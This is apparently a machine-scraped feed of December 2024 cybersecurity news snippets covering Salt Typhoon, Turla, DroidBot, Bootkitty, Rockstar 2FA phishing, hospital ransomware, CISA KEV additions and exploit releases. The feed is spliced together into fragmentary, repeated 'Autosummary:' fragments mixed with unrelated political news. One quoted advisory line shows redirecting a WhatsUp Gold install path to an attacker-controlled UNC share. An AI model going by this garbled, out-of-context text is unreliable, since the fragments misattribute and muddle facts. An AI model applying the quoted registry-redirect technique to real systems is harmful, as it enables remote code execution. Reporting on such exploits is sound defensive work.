"Sosa" and "Elijah," of Palm Coast, Florida; Evans Onyeaka Osiebo, 20, of Dallas, Texas; Joel Martin Evans, 25, a.k.a. "joeleoli," of Jacksonville, North Carolina; Tyler Robert Buchanan, 22, of the United Kingdom. "Autosummary:
The FBI official added: “People looking to further protect their mobile device communications would benefit from considering using a cellphone that automatically receives timely operating system updates, responsibly managed encryption and phishing resistant multi-factor authentication for email, social media, and collaboration tool accounts.” "Autosummary:
Led by the National Crime Agency working with Border Force, Op Destabilise has exposed Russian kleptocrats, drug gangs, and cyber criminals - all of whom relied on the flow of dirty money," said Security Minister Dan Jarvis. "A zero-day vulnerability in the Mitel MiCollab enterprise collaboration suite can be exploited to read files containing sensitive data, watchTowr researcher Sonny Macdonald has disclosed, and followed up by releasing a proof-of-concept (PoC) exploit that chains together this zero-day file read vulnerability with CVE-2024-41713, which allows attackers to bypass authentication. A zero-day and PoC to grab sensitive info of MiCollab users In a blog post published on Thursday, Macdonald tells of watchTowr’s quest to reproduce … More
The post Mitel MiCollab zero-day and PoC exploit unveiled appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Campaigns leveraging DroidBot have been primarily observed in Austria, Belgium, France, Italy, Portugal, Spain, Turkey, and the United Kingdom. "Autosummary:
Following this incident, account credentials for Romanian election sites, including bec.ro (Central Election Bureau), roaep.ro, and registrulelectoral.ro (voter registration), were leaked on a Russian cybercrime forum. "Autosummary:
“Through the TGR Group, Russian elites sought to exploit digital assets—in particular U.S. dollar-backed stablecoins—to evade U.S. and international sanctions, further enriching themselves and the Kremlin,” said Acting Under Secretary for Terrorism and Financial Intelligence Bradley T. Smith, “The United States, alongside our allies and partners, remains committed to disrupting any effort by Russia to use digital assets or other illicit financial schemes to accrue, store, and transfer their ill-gotten gains.” “Through key facilitators like Zhdanova, Russian elites, ransomware groups, and other illicit actors sought to evade U.S. and international sanctions, particularly through the abuse of virtual currency,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson. "Autosummary:
In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data.China-linked APT Salt Typhoon has breached telcos in dozens of countries Pierluigi Paganini December 05, 2024 December 05, 2024 China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries, US govt warns. “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. "Autosummary:
Sheinbaum"s remarks came after Canada"s US ambassador, Kirsten Hillman, told the news agency that during a recent dinner at Mar-a-Lago, Trump"s Florida residence, Prime Minister Justin Trudeau told the president-elect that the northern border was "vastly different than the Mexican border". "High-risk access exists throughout the workplace, in almost every job role, proving that the time has come for organizations to re-think the way they protect their workforce, according to CyberArk. CyberArk surveyed 14,003 employees in the UK, USA, France, Germany, Australia and Singapore to uncover workforce behaviors that security teams are most keen to put a stop to. Employees depend on privileged access to complete daily tasks These days, almost all employees have some kind … More
The post 65% of office workers bypass cybersecurity to boost productivity appeared first on Help Net Security.
"Autosummary:
CyberArk found that all employees surveyed access work applications and services from their corporate device, including access communications and collaboration tools e.g. Teams, Slack, Outlook (52%), IT admin and management tools (41%) and customer-facing apps (34%). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
U.S. CISA adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini December 04, 2024 December 04, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog. "Autosummary:
And, according to Jérôme Segura, senior director of research at security firm Malwarebytes, the most common type of malicious Google search ads encountered are those which pose as the customer support teams of major internet brands like PayPal, eBay, Apple, and Netflix. "Researchers have published a proof-of-concept (PoC) exploit for CVE-2024-8785, a critical remote code execution vulnerability affecting Progress WhatsUp Gold, a popular network monitoring solution for enterprises. CVE-2024-8785 and the PoC exploit CVE-2024-8785 stems from the incorrect use of a privileged application programming interface (API) that may allow attackers to overwrite the Windows Registry. The API endpoint in question – NmAPI.exe – can be exploited by unauthenticated, remote attackers to change an existing registry value or … More
The post PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks Pierluigi Paganini December 04, 2024 December 04, 2024 Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks in a joint advisory. In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data. “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. "Autosummary:
At the same time, Turla stole data from OilRig"s systems, including keylogger logs, directory listings, files, account credentials, and malware builders for private tools such as Neuron. It was determined that in late 2022, Turla had breached multiple C2 nodes of the Storm-0156 threat actor and deployed their own malware payloads, including a TinyTurla backdoor variant, the TwoDash backdoor, the Statuezy clipboard monitor, and the MiniPocket downloader. "Autosummary:
The latest available firmware version, v2.1.9, addresses only CVE-2024-52564, and I-O Data states that fixes for the other two vulnerabilities will be made available in v2.2.0, scheduled for release on December 18, 2024. "Autosummary:
For example, users often: Start their passwords with a capital letter (e.g., welcome456 becomes Welcome456) End their passwords with a number or symbol (e.g., Welcome456, Welcome2024!!)Password length > password complexity For years, organizations have created password policies that follow a rigid formula — requiring users to include upper and lowercase letters, numbers, and symbols — to create passwords that are difficult to crack.Instead of asking users to come up with a random, difficult-to-remember combination of letters, numbers, and symbols, urge them to create longer passwords or passphrases that will be easy to recall but harder for hackers to guess. "Autosummary:
By siphoning your money out of your accounts, and by sometimes even fabricating false “returns” on your investments, the cybercriminals are slowly building trust from you, only to yank away all your money at a later date.Remember, if a celebrity or public figure is suddenly making large promises on specific, individual cryptocurrencies, be cautious about their claims. "Autosummary:
"Autosummary:
Turla, also known by the names Blue Python, Iron Hunter, Pensive Ursa, Secret Blizzard (formerly Krypton), Snake, SUMMIT, Uroburos, Venomous Bear, and Waterbug, is assessed to be affiliated with Russia"s Federal Security Service (FSB). "Autosummary:
As part of this Operation Destabilise, U.K. law enforcement has collaborated with many international partners, including the U.S. Department of the Treasury"s Office of Foreign Assets Control (OFAC), the FBI, the Drug Enforcement Agency, the French Direction Centrale de la Police Judiciaire, and Ireland"s national police and security service, An Garda Síochána (AGS). "Autosummary:
Some of its most notable victims include U.S. healthcare giant Ascension, U.K. tech outsourcing firm Capita, German defense contractor Rheinmetall, government contractor ABB, Hyundai"s European division, the Toronto Public Library, the American Dental Association, and Yellow Pages Canada. "Autosummary:
Among the 77 apps DroidBot attempts to steal credentials, some standouts include Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken, and Garanti BBVA. "Autosummary:
Released with the FBI, the NSA, and international partners, this joint advisory includes tips on hardening network security to shrink the attack surface targeted by the Chinese state hackers, including unpatched devices, vulnerable services exposed to online access, and generally less-secured environments. "Autosummary:
Among the 77 apps DroidBot attempts to steal credentials, some standouts include Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken, and Garanti BBVA. "Autosummary:
At the same time, Turla stole data from OilRig"s systems, including keylogger logs, directory listings, files, account credentials, and malware builders for private tools such as Neuron. It was determined that in late 2022, Turla had breached multiple C2 nodes of the Storm-0156 threat actor and deployed their own malware payloads, including a TinyTurla backdoor variant, the TwoDash backdoor, the Statuezy clipboard monitor, and the MiniPocket downloader. "Autosummary:
The group claimed to have stolen 500GB of data including Finacial data, Organisation data, Users data and personal documents, NDA’s, Confidential data, and more. "In this Help Net Security interview, Doug Kersten, CISO of Appfire, explains how treating AI like a human can change the way cybersecurity professionals use AI tools. He discusses how this shift encourages a more collaborative approach while acknowledging AI’s limitations. Kersten also discusses the need for strong oversight and accountability to ensure AI aligns with business goals and remains secure. Treating AI like a human can accelerate its development. Could you elaborate on how … More
The post Treat AI like a human: Redefining cybersecurity appeared first on Help Net Security.
"Autosummary:
Like humans, AI, while powerful, is not infallible—it can make mistakes, propagate biases, or produce outputs that don’t align with organizational goals. While AI can provide valuable insights and automate critical functions, humans—across technical, security, legal, and leadership teams—must ensure that accountability is upheld when mistakes occur.AI models are only as good as the data they consume, and if that data is incomplete, biased, or outdated, the outputs may be flawed.Security leaders, legal teams, and compliance officers must collaborate to create governance structures that ensure proper accountability for AI-driven decisions, especially in sensitive areas like cybersecurity. "Application Security Engineer TE Connectivity | USA | Remote – View job details As an Application Security Engineer, you will design, develop, and implement a robust Application Security program. Create and maintain application security policies, standards, and procedures. Participate in the incident response process, focusing on application-related security incidents. Investigate and analyze security breaches and provide actionable recommendations to prevent recurrence. Cryptography engineer Leonar | France | On-site – View job details As a Cryptography … More
The post Cybersecurity jobs available right now: December 3, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Defense Specialist MSC Cruises | Italy | On-site – View job details As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security gateway, emergency detect and response, logging and auditing, event and incident management, privileged access management and authentication. Offensive Security Engineer Cyberbit | Israel | On-site – View job details As an Offensive Security Engineer, you will design, build, and implement red team labs, vulnerable websites, CTF challenges, and exercises tailored for varying skill levels, covering offensive security concepts, AWS-based infrastructure, and Docker deployments. Manager, Threat Detection & Penetration Testing Stripe | USA | Remote – View job details As a Manager, Threat Detection & Penetration Testing, you will lead, mentor, and support a team of threat analysts and penetration testers in detecting, analyzing, and mitigating security threats. Cyber Analyst, Digital Forensics Incident Response At-Bay | USA | Remote – View job details As a Cyber Analyst, Digital Forensics Incident Response, you will investigate cyber incidents, analyze evidence, and assist in recovery efforts, including threat actor negotiations. "Autosummary:
"The lack of communication surrounding some important details has left us feeling excluded from potentially crucial developments,” her sister, Sydni Kobayashi, said in a statement, according to the Times. "Autosummary:
Bootkitty exploits LogoFAIL via tampered BMP files to inject shellcode, bypass Secure Boot, and target specific devices from different manufacturers, including Acer, HP, Fujitsu, and Lenovo. "Autosummary:
Fortunately, Alder Hey Children"s Hospital says that it continues to operate as normal, and that patients" care has not been disrupted as a result of the suspected data breach, in what appears to be the latest in a string of ransomware attacks against NHS organisations. "ENGlobal, a Texas-based engineering and automation contractor for companies in the energy sector, has had its data encrypted by attackers. “On November 25, 2024, ENGlobal Corporation (the “Company”) became aware of a cybersecurity incident. The preliminary investigation has revealed that a threat actor illegally accessed the Company’s information technology (“IT”) system and encrypted some of its data files,” the company shared in an 8-K filed on Monday with the US Securities and Exchange Commission. The … More
The post US government, energy sector contractor hit by ransomware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
An insufficient certificate validation vulnerability impacting Palo Alto Networks GlobalProtect for Windows, macOS, and Linux that allows the app to be connected to arbitrary servers, leading to the deployment of malicious software (Addressed in version 6.2.6 for Windows) (CVSS score: 5.6) - "Autosummary:
"Autosummary:
Energy industry contractor ENGlobal Corporation discloses a ransomware attack Pierluigi Paganini December 03, 2024 December 03, 2024 ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. "Autosummary:
Poland probes Pegasus spyware abuse under the PiS government Pierluigi Paganini December 03, 2024 December 03, 2024 Poland probes Pegasus spyware abuse under the PiS government; ex-security chief Piotr Pogonowski arrested to testify before parliament. "Veeam has fixed two vulnerabilities in Veeam Service Provider Console (VSPC), one of which (CVE-2024-42448) may allow remote attackers to achieve code exection on the VSPC server machine. The vulnerabilities Veeam Service Provider Console is a cloud-enabled platform that allows enterprises to manage and monitor backup operations across their offices. It’s also used by service providers to deliver Backup-as-a-Service (BaaS) and Disaster Recovery-as-a-Service (DRaaS) services to customers. The solution uses management agents to interact with … More
The post Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) appeared first on Help Net Security.
"Autosummary:
"The cyber world needs your expertise. However, the security leaders of tomorrow require a broad set of skills that job experience alone does not arm you with. What do organizations demand? And how can you acquire the technical and soft skills that drive business prosperity? Download the whitepaper to: Overcome cybersecurity challenges putting enterprise success at risk Make a positive and lasting impact Explore the 9 key characteristics of effective leaders in the field Fill … More
The post Whitepaper: 9 traits of effective cybersecurity leaders of tomorrow appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Other hardening best practices highlighted in today"s advisory include: Patching and upgrading devices promptly, Disabling all unused, unauthenticated, or unencrypted protocols, Limiting management connections and privileged accounts, Using and storing passwords securely, Using only strong cryptography. "Autosummary:
"Through the UpdateFailoverRegistryValues operation, the attacker can change an existing registry value or create a new one for any registry path under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\." "Specifically, the attacker can change HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\Network Monitor\WhatsUp Gold\Setup\InstallDir to a UNC path pointing to a host controlled by the attacker (i.e., \\<attacker-ip>\share\WhatsUp). "Autosummary:
"Autosummary:
Search for help, find a scam Search engines, and Google’s in particular, are our gateway to the web. Somewhere far in Asia, someone in a call centre is waiting to welcome the next victim by starting with “Hi, welcome to PayPal support, my name is John, how can I help you? "Autosummary:
"Autosummary:
"Autosummary:
Kuci, described as a "trusted member of the operation", was jailed for 21 years and Diko, who also moved to the UK from Albania and had worked as a mechanic, for 18 years. "Autosummary:
Ptitsyn, who was extradited to the United States out of South Korea, now faces 13 counts, which include wire fraud, conspiracy to commit wire fraud, and conspiracy to commit computer fraud and abuse, along with four counts each of causing intentional damage to protected computers and extortion in relation to hacking. "Radiant Logic announces the expansion of its central intelligence hub solution, RadiantOne, to now include Identity Observability. Building on the identity security foundation of Identity Data Management and Identity Analytics, Identity Observability allows the world’s most complex organizations to access an intuitive map of their entire identity infrastructure with 360° continuously streaming visibility, an intelligent risk collaboration hub, and seamless AI-powered risk remediation workflows. For large organizations wrestling with identity sprawl or legacy architectures, the … More
The post Radiant Logic provides continuous identity hygiene assessments via real-time streaming data appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Titled "Building Tomorrow, Securely: Securing the Use of AI in App Development," this session will arm you with the knowledge and tools to tackle the challenges of AI-powered innovation. "Autosummary:
The list includes:: CVE-2024-11680 (ProjectSend), CVE-2023-28461 (Array Networks AG and vxAG), CVE-2024-10542, CVE-2024-10781 (Spam protection, Anti-Spam, and FireWall plugin), CVE-2024-49035 (Microsoft Partner Center), CVE-2024-49806, CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-50357 (FutureNet NXR routers), CVE-2024-52338 (Apache Arrow R package), CVE-2024-52490 (Pathomation), CVE-2024-8672 (Widget Options – The #1 WordPress Widget & Block Control plugin), CVE-2024-11103 (Contest Gallery plugin), CVE-2024-42327 (Zabbix), and CVE-2024-53676 (Hewlett Packard Enterprise Insight Remote Support).Since at least May 2024, the group has been found to quickly embrace and modify existing ransomware builders such as AzzaSec, Diamond, Doubleface (aka Invisible), LockBit, Chaos, and Babuk to launch its attacks.RomCom Exploits Mozilla Fire and Windows 0-Days: The Russia-aligned threat actor known as RomCom chained two zero-day security flaws in Mozilla Firefox (CVE-2024-9680, CVSS score: 9.8) and Microsoft Windows (CVE-2024-49039, CVSS score: 8.8) as part of attacks designed to deliver the eponymous backdoor on victim systems without requiring any user interaction. The Russia-aligned threat actor known as RomCom chained two zero-day security flaws in Mozilla Firefox (CVE-2024-9680, CVSS score: 9.8) and Microsoft Windows (CVE-2024-49039, CVSS score: 8.8) as part of attacks designed to deliver the eponymous backdoor on victim systems without requiring any user interaction.Ideal for threat hunting, incident response, and security operations, it streamlines integration, ensures rapid deployment of updated detection rules, and supports multiple backends via pySigma.Ideal for threat hunting, incident response, and security operations, it streamlines integration, ensures rapid deployment of updated detection rules, and supports multiple backends via pySigma.According to data collected by Corvus, RansomHub, Play, LockBit 3.0, MEOW, and Hunters International have accounted for 40% of all attacks observed in Q3 2024.According to data collected by Corvus, RansomHub, Play, LockBit 3.0, MEOW, and Hunters International have accounted for 40% of all attacks observed in Q3 2024. 🔒 Tip of the Week Your Screenshots Are Secretly Talking Behind Your Back — Every screenshot you share could reveal your device info, location, OS version, username, and even internal system paths without your knowledge.Cybersecurity firm Morphisec said it identified five significant NTLM vulnerabilities that could be exploited to leak the credentials via Malicious RTF Document Auto Link in Microsoft Word, Remote Image Tag in Microsoft Outlook, Remote Table Refresh in Microsoft Access, Legacy Player Files in Microsoft Media Player, and Remote Recipient List in Microsoft Publisher. "Autosummary:
Préstamo Seguro-Rápido, seguro (com.prestamoseguro.ss ) Préstamo Rápido-Credit Easy (com.voscp.rapido) ได้บาทง่ายๆ-สินเชื่อด่วน (com.uang.belanja) RupiahKilat-Dana cair (com.rupiahkilat.best) ยืมอย่างมีความสุข – เงินกู้ (com.gotoloan.cash) เงินมีความสุข – สินเชื่อด่วน (com.hm.happy.money) KreditKu-Uang Online (com.kreditku.kuindo) Dana Kilat-Pinjaman kecil (com.winner.rupiahcl) Cash Loan-Vay tiền (com.vay.cashloan.cash) RapidFinance (com.restrict.bright.cowboy) PrêtPourVous (com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret) Huayna Money – Préstamo Rápido (com.huaynamoney.prestamos.creditos.peru.loan.credit) IPréstamos: Rápido Crédito (com.credito.iprestamos.dinero.en.linea.chile) ConseguirSol-Dinero Rápido (com.conseguir.sol.pe) ÉcoPrêt Prêt En Ligne (com.pret.loan.ligne.personnel) Some of these apps have been promoted through posts on social media platforms like Facebook, indicating the various methods threat actors are using to trick predictive victims into installing them. "Autosummary:
The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from web browsers, Outlook, Thunderbird, FileZilla, and WinSCP. "Autosummary:
Bootkitty attack overview Source: Binarly Impact on specific hardware Binarly says Bootkitty could impact any device that has not been patched against LogoFAIL, but its current shellcode expects specific code used in firmware modules found on Acer, HP, Fujitsu, and Lenovo computers. "It’s no secret that developers often inadvertently expose AWS access keys online and we know that these keys are being scraped and misused by attackers before organizations get a chance to revoke them. Clutch Security researchers performed a test to see just how quickly that can happen. They dispersed AWS access keys (in different scenarios) on: Code hosting and version control platforms: GitHub and GitLab Public code repositories: Docker Hub (for containers), npm (for JavaScript … More
The post The shocking speed of AWS key exploitation appeared first on Help Net Security.
"Autosummary:
They dispersed AWS access keys (in different scenarios) on: Code hosting and version control platforms: GitHub and GitLab Public code repositories: Docker Hub (for containers), npm (for JavaScript packages), PyPI (for software written in Python), Crates.io (for Rust crates) Repositories for hosting and testing code snippets: JSFiddle, Pastebin, and public and private GitHub Gists Developer forums: Stack Overflow, Quora, Postman Community, and Reddit The results of this test revealed that attackers tend to find and exploit (within a few minutes) "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Researchers reveal exploitable flaws in corporate VPN clients Researchers have discovered vulnerabilities in the update process of Palo Alto Networks (CVE-2024-5921) and SonicWall (CVE-2024-29014) corporate VPN clients that could be exploited to remotely execute code on users’ devices. Cybercriminals used a gaming engine to create undetectable malware loader Threat actors are using an ingenious new way for covertly delivering malware … More
The post Week in review: Exploitable flaws in corporate VPN clients, malware loader created with gaming engine appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: November 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Absolute, Arkose Labs, Atakama, BlackFog, Eurotech, HiddenLayer, Hornetsecurity, Nirmata, Radware, Rakuten Viber, Symbiotic Security, Tanium, and Vectra AI. Choosing the right secure messaging app for your organization In this Help Net Security interview, Liad Shnell, CTO at Rakuten Viber, discusses what organizations should look for in secure messaging apps, including encryption, privacy standards, and ease of integration. "Autosummary:
Phishing email Source: BleepingComputer These attachments use a wide range of themes, all revolving around employee benefits and bonuses, including: Annual_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx Annual_Q4_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin Due_&_Payment_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin Q4_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin The documents in this campaign all include the base64 encoded string "IyNURVhUTlVNUkFORE9NNDUjIw," which decodes to "##TEXTNUMRANDOM45##". "Autosummary:
"Autosummary:
Hackers stole millions of dollars from Uganda Central Bank Pierluigi Paganini December 01, 2024 December 01, 2024 Financially-motivated threat actors hacked Uganda ‘s central bank system, government officials confirmed this week. "Autosummary:
Major world powers China and Russia are part of the Brics alliance, along with Brazil, India, South Africa, Iran, Egypt, Ethiopia and the United Arab Emirates. "Autosummary:
"Autosummary:
"Autosummary:
He has been tied to Lockbit, Conti, and BABUKhttps://t.co/t2VAJjhlJS — vx-underground (@vxunderground) November 29, 2024 “The Kaliningrad Interior Ministry and the prosecutor’s office reported that the case of a programmer accused of creating a malicious program has been sent to court; according to a RIA Novosti source, this is hacker Mikhail Matveyev, for whom the American FBI is offering a $10 million reward for help in capturing him.” reported RIA Novosti. "In this Help Net Security interview, Steve Carter, CEO of Nucleus Security, discusses the ongoing challenges in vulnerability management, including prioritizing vulnerabilities and addressing patching delays. Carter also covers compliance requirements and how automation can streamline vulnerability management processes. Why do you think challenges like prioritizing vulnerabilities and patching delays persist despite technological advances? The increasing complexity of enterprise infrastructure, expanding attack surface, and improved vulnerability and exposure detection capabilities have all led to a … More
The post The effect of compliance requirements on vulnerability management strategies appeared first on Help Net Security.
"Autosummary:
Vulnerability detection and exposure management capabilities have broadened to now include assessments of identity, data management, and SaaS systems, which has significantly increased the volume and types of findings that must be tracked and reported on, which is often overlooked by security and compliance teams.In this Help Net Security interview, Steve Carter, CEO of Nucleus Security, discusses the ongoing challenges in vulnerability management, including prioritizing vulnerabilities and addressing patching delays. "Autosummary:
WUTH, which manages Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children"s Hospital, proactively isolated its IT systems when it first detected the threat, forcing it to revert to manual processes and the use of pen-and-paper. "Autosummary:
Some of the promoted features of Rockstar 2FA include two-factor authentication (2FA) bypass, 2FA cookie harvesting, antibot protection, login page themes mimicking popular services, fully undetectable (FUD) links, and Telegram bot integration. "Autosummary:
"Autosummary:
Trustwave The service is promoted on Telegram, among other places, boasting a long list of features like: Support for Microsoft 365, Hotmail, Godaddy, SSO Randomized source code and links to evade detection Cloudflare Turnstile Captcha integration for victim screening Automated FUD attachments and links User-friendly admin panel with real-time logs and backup options Multiple login page themes with automatic organization branding (logo, background) The service has set up over 5,000 phishing domains since May 2024, facilitating various phishing operations. "Autosummary:
In April 2021, the defendant and Babuk ransomware coconspirators allegedly deployed malicious payloads on the systems of the Metropolitan Police Department in Washington, D.C. In May 2022, Matveev and Hive ransomware gang members allegedly encrypted the systems of a nonprofit behavioral healthcare organization headquartered in Mercer County, New Jersey. "Autosummary:
Complete financial data of the club"s history Personal and confidential player data Transfer strategies for new and young players Confidential data of fans and employees Data on young athletes Medical records Information on structures and stadiums Commercial strategies and business plans Previously, the threat actors attempted to blackmail the Italian football team by listing examples of how leaked documents caused other teams to pay huge fines over various violations and used GDPR as leverage. "Autosummary:
"Autosummary:
Phishing-as-a-Service Rockstar 2FA continues to be prevalent Pierluigi Paganini November 29, 2024 November 29, 2024 Phishing tool Rockstar 2FA targets Microsoft 365 credentials, it uses adversary-in-the-middle (AitM) attacks to bypass multi-factor authentication. "Despite the efforts of law enforcement agencies to stop and bring to justice those responsible for ransomware attacks, the situation is not improving. While authorities do not recommend making a ransomware payment, some companies are forced to make that choice in order to continue their operations. In this article, we present some important statistics about the ransom demands that companies are facing. 83% of organizations experienced at least one ransomware attack in the last year … More
The post Ransomware payments are now a critical business decision appeared first on Help Net Security.
"Autosummary:
Onapsis | ERP Security in the Age of AI-Enhanced Ransomware | September 2024 34% of organizations that experience ransomware attacks pay the ransom every time, 21% pay the ransom only some of the time, and 45% never pay the ransom. "In today’s dynamic threat landscape, security leaders are under constant pressure to make informed choices about which solutions and strategies they employ to protect their organizations. The “MITRE Engenuity ATT&CK Evaluations: Enterprise” stand out as an essential resource for cybersecurity decision makers to navigate this challenge. Unlike other independent assessments, MITRE ATT&CK Evaluations simulate real-world threats to assess how competing cybersecurity vendors detect and respond to real-world threats. As soon as the highly anticipated 2024 MITRE … More
The post Why cybersecurity leaders trust the MITRE ATT&CK Evaluations appeared first on Help Net Security.
"Autosummary:
Several key factors set MITRE ATT&CK Evaluations apart from other independent analyst assessments, making them particularly valuable for security leaders: Real-world conditions: Unlike other assessments, MITRE ATT&CK Evaluations are based on simulated TTPs by specific threat actors. "Attackers leveraging virtual private network (VPN) vulnerabilities and weak passwords for initial access contributed to nearly 30% of ransomware attacks, according to Corvus Insurance. According to the Q3 report, many of these incidents were traced to outdated software or VPN accounts with inadequate protection. For example, common usernames such as “admin” or “user” and a lack of multi-factor authentication (MFA) made accounts vulnerable to automated brute-force attacks, where attackers exploit publicly accessible systems by testing … More
The post VPN vulnerabilities, weak credentials fuel ransomware attacks appeared first on Help Net Security.
"Autosummary:
For example, following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, becoming one of the more prolific and dangerous cybercriminal groups. "Autosummary:
"Autosummary:
Collectively, these hospitals contribute to NHS Trust"s total of 855 beds and provide 24-hour emergency services, acute medical services, critical care, surgery, diagnostic services, pediatrics, maternity services, and cancer care. "Autosummary:
The newest addition is Godot Engine, a game development platform that allows users to design 2D and 3D games across platforms, including Windows, macOS, Linux, Android, iOS, PlayStation, Xbox, Nintendo Switch, and the web. "Autosummary:
Yes, some variants of Mimic can also exfiltrate data from a user"s computers before it is encrypted - the stolen data is typically used as an additional bargaining chip by the extortionists, who may threaten to release it online or sell it to other criminals. Well, a new variant of Mimic has recently been discovered called Elpaco, which has been used in attacks where malicious hackers accessed victims" systems via RDP after successfully brute-forcing their way in. "Autosummary:
"Autosummary:
A cyberattack impacted operations at UK Wirral University Teaching Hospital Pierluigi Paganini November 28, 2024 November 28, 2024 UK’s Wirral University Teaching Hospital suffered a cyberattack that caused delays in appointments and procedures. "Autosummary:
ProjectSend critical flaw actively exploited in the wild, experts warn Pierluigi Paganini November 28, 2024 November 28, 2024 Researchers warn that a critical security flaw in ProjectSend open-source file-sharing application may be under active exploitation. "Autosummary:
"Autosummary:
"32% of warehouse respondents report that social engineering is one of the most-used entry points in warehouse cyberattacks – tied with software vulnerabilities (32%) and followed by devices (19%), according to Ivanti. Cyberattacks on warehouses threaten supply chain stability As the backbone of the supply chain, a cyberattack on a warehouse can result in major consequences such as significant operational downtime, damage to a company’s reputation and financial losses. Given the vast amount of data … More
The post Supply chain managers underestimate cybersecurity risks in warehouses appeared first on Help Net Security.
"Autosummary:
The top budget priorities for supply chain managers are sourcing and procurement (41%), workforce productivity (40%), automation technologies (39%), and lowering operating costs (39%). "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. ScubaGear ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment. Am I Isolated: Open-source container security … More
The post Hottest cybersecurity open-source tools of the month: November 2024 appeared first on Help Net Security.
"Autosummary:
"QScanner is a Linux command-line utility tailored for scanning container images and performing Software Composition Analysis (SCA). It is compatible with diverse container orchestration systems, container runtimes, and operating systems. QScanner features Instant console results: Scan for vulnerabilities and receive real-time results directly on the console. Integration: Seamlessly integrate QScanner with your CI/CD pipelines and leverage the benefits of security policy-based evaluations. Runtime support: QScanner is compatible with multiple container runtimes enabling flexibility in deployment … More
The post QScanner: Linux command-line utility for scanning container images, conducting SCA appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Carl Froggett, CIO of Deep Instinct, discusses the complexities of modern cloud architectures and why current defenses are falling short. He talks about the rise of zero-day data security and the need for organizations to stop attacks before they breach cloud environments and exfiltrate sensitive data.
The post Zero-day data security appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a do-it-all-yourself approach to cyberattacks," Assaf Morag, director of threat intelligence at cloud security firm Aqua, said. "Autosummary:
The downloader then accesses Bitbucket using the encoded unique string in order to retrieve the next stage, a file known as "Service.dat," which downloads two more artifacts from a different Bitbucket repository – "cbmp.txt" and "icon.txt" – which are saved as "cn.dat" and "sp.dat," respectively. "Autosummary:
"ESET Research has discovered the first UEFI bootkit designed for Linux systems, named Bootkitty by its creators. Researchers believe this bootkit is likely an initial proof of concept, and based on ESET telemetry, it has not been deployed in the wild. Bootkitty execution overview (Source: ESET) However, it is the first evidence that UEFI bootkits are no longer confined to Windows systems alone. The bootkit’s main goal is to disable the kernel’s signature verification feature … More
The post ESET researchers analyze first UEFI bootkit for Linux systems appeared first on Help Net Security.
"Autosummary:
It all started with the first UEFI bootkit proof of concept (PoC), described by Andrea Allievi in 2012, which served as a demonstration of deploying bootkits on modern UEFI-based Windows systems, and was followed with many other PoCs (EfiGuard, Boot Backdoor, UEFI-bootkit). "Autosummary:
"Autosummary:
"Autosummary:
